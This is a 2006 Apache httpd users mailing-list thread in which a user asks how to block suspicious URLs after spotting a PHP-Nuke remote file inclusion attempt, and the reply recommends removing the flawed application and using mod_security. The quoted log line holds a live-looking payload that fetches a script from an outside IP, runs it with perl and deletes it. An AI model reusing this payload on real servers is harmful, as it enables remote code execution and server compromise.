Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




of course, this is not working, (you have to be authenticated to use this page as an admin user), but it's a useless waste of bandwidth and i think it's better deny the access by a common security mechanism before. The question is that

So, with mod_security can i block supspicious urls with regexp?

2006/8/8, Joshua Slive <joshua@xxxxxxxx>:
On 8/7/06, david <dvelayos@xxxxxxxxx> wrote:
> Hello!
>
> Recently, i've founded some entries on my apache webserver log like this:
>
> [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20 >%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
>
> As you can see, some attacker tries to use the index.php file to get a
> cmd.txt file from other site.
>
> are there any way to detect this urls to stop this configuring apache?

If this is actually working on your server, you need to immediately
get rid of the application that is allowing it (php-nuke it seems),
since it has a major security flaw.

In general, mod_security can be used to block suspicious URLs.  But it
is not a substitute for making sure you only use secure web
applications.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx



[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux